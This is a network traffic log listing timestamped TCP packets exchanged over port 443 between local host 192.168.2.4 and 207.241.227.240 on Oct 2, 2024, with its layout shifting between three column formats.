Oct 2, 2024 05:30:41.123418093 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.124252081 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.124270916 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.124303102 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.124310017 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.124336958 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.124356031 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.125036955 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.125055075 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.125086069 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.125092030 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.125117064 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.125134945 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.190897942 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.190923929 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.190985918 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.190996885 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.191032887 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.192044020 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.192059994 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.192091942 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.192097902 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.192138910 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.192157030 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.193195105 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.193209887 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.193243027 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
Oct 2, 2024 05:30:41.193248034 CEST | 443 | 49730 | 207.241.227.240 | 192.168.2.4
Oct 2, 2024 05:30:41.193274021 CEST | 49730 | 443 | 192.168.2.4 | 207.241.227.240
                                                          Oct 2, 2024 05:30:41.193957090 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.193978071 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.193984032 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.193989992 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.194009066 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.194050074 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.259773016 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.259798050 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.259885073 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.259897947 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.259944916 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.260982037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.260998011 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.261045933 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.261053085 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.261109114 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.261646986 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.261662006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.261710882 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.261718035 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.261759996 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.326960087 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.326983929 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.327064037 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.327075958 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.327117920 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.328010082 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.328023911 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.328079939 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.328087091 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.328124046 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.329107046 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.329122066 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.329169989 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.329176903 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.329215050 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.329989910 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.330004930 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.330068111 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.330075026 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.330111027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.395390987 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.395428896 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.395644903 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.395658970 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.395703077 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.396503925 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.396524906 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.396584988 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.396591902 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.396634102 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.397217989 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.397236109 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.397315979 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.397322893 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.397367954 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.398893118 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.398907900 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.398957968 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.398963928 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.398999929 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.464467049 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.464498997 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.464637041 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.464662075 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.464706898 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.465272903 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.465293884 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.465357065 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.465363979 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.465405941 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.466137886 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.466160059 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.466203928 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.466211081 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.466236115 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.466254950 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.467895985 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.467917919 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.467989922 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.468005896 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.468043089 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.531904936 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.531934023 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.532130003 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.532162905 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.532215118 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.532844067 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.532860994 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.532923937 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.532931089 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.532968998 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.534363031 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.534380913 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.534449100 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.534456968 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.534506083 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.535341024 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.535358906 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.535422087 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.535429001 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.535466909 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.599611998 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.599638939 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.599791050 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.599829912 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.599880934 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.600693941 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.600708961 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.600759029 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.600785017 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.600807905 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.600824118 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.601663113 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.601675987 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.601733923 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.601742029 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.601792097 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.603219986 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.603235006 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.603288889 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.603312969 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.603362083 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.618721962 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.618743896 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.618953943 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.618993044 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.619043112 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.668335915 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.668365955 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.668477058 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.668531895 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.668631077 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.669620037 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.669636965 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.669718027 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.669728994 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.669770956 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.670615911 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.670633078 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.670720100 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.670730114 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.670774937 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.691641092 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.691669941 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.691838980 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.691890001 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.691952944 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.735426903 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.735456944 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.735609055 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.735666990 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.735724926 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.736352921 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.736373901 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.736445904 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.736460924 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.736476898 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.736502886 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.737313986 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.737339973 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.737386942 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.737402916 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.737421989 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.737446070 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.738307953 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.738333941 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.738380909 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.738395929 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.738409042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.738445044 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.754653931 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.754683971 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.754806042 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.754853010 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.754906893 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.803458929 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.803495884 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.803592920 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.803627968 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.803683043 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.804373026 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.804402113 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.804442883 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.804459095 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.804478884 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.804505110 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.804971933 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.804991961 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.805042982 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.805052996 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.805094004 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.805116892 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.806400061 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.806421995 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.806504965 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.806529045 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.806577921 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.822818995 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.822854996 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.822953939 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.822990894 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.823035955 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.823848963 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.823872089 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.823966026 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.823985100 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.824033022 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.873605013 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.873631954 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.873816013 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.873857975 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.873908043 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.874532938 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.874561071 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.874612093 CEST49730443192.168.2.4207.241.227.240
                                                          Oct 2, 2024 05:30:41.874634027 CEST44349730207.241.227.240192.168.2.4
                                                          Oct 2, 2024 05:30:41.874671936 CEST49730443192.168.2.4207.241.227.240
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Oct 2, 2024 05:30:41.875919104 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.875955105 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.876019955 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.876044035 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.876105070 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.891168118 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.891202927 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.891366005 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.891412973 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.891458988 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.892030954 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.892050982 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.892124891 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.892137051 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.892172098 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.892188072 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.941730976 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.941760063 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.941924095 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.941956997 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.942006111 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.942631006 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.942651987 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.942703009 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.942717075 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.942759991 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.943867922 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.943886042 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.943948030 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.943965912 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.944001913 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.960124969 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.960150003 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.960221052 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.960257053 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.960279942 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.960295916 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.961226940 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.961245060 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.961302042 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.961319923 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.961369038 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.961994886 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.962012053 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.962215900 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:41.962233067 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:41.962285042 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.010236979 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.010261059 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.010377884 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.010412931 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.010579109 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.011177063 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.011200905 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.011236906 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.011244059 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.011266947 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.011290073 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.027981043 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.028002977 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.028079033 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.028111935 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.028155088 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.029198885 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.029212952 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.029263973 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.029278040 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.029310942 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.030396938 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.030414104 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.030463934 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.030476093 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.030519962 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.046463013 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.046484947 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.046571016 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.046602964 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.046741962 CEST  49730        443        192.168.2.4      207.241.227.240
Oct 2, 2024 05:30:42.078620911 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.078644037 CEST  443          49730      207.241.227.240  192.168.2.4
Oct 2, 2024 05:30:42.078795910 CEST  49730        443        192.168.2.4      207.241.227.240
